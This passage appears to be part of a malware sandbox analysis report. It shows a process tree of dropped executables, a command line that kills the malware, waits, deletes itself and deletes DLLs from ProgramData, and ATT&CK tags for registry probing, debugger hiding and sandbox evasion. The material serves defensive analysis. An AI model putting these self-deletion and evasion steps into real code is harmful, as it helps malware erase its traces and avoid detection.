C:\Users\Admin\AppData\Local\670088e6-b778-4e42-b9a6-36ef49d82395\build2.exe"C:\Users\Admin\AppData\Local\670088e6-b778-4e42-b9a6-36ef49d82395\build2.exe"6⤵
- Loads dropped DLL
- Checks processor information in registry
PID:6308 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\670088e6-b778-4e42-b9a6-36ef49d82395\build2.exe" & del C:\ProgramData\*.dll & exit7⤵PID:6416
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
PID:7360
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:6516
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D880.exeC:\Users\Admin\AppData\Local\Temp\D880.exe1⤵
- Loads dropped DLL
- Checks processor information in registry
- NTFS ADS
PID:6132 -
C:\ProgramData\BNKIBJUQX4H2CQ2R.exe"C:\ProgramData\BNKIBJUQX4H2CQ2R.exe"2⤵PID:4536
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im D880.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\D880.exe" & del C:\ProgramData\*.dll & exit2⤵PID:7428
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im D880.exe /f3⤵
- Kills process with taskkill
PID:5240
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:4628
-
-
-
C:\Users\Admin\AppData\Local\Temp\F688.exeC:\Users\Admin\AppData\Local\Temp\F688.exe1⤵PID:7392
-
C:\Users\Admin\AppData\Local\Temp\CF00.exeC:\Users\Admin\AppData\Local\Temp\CF00.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6496
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Disabling Security Tools
1File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
1Web Service
1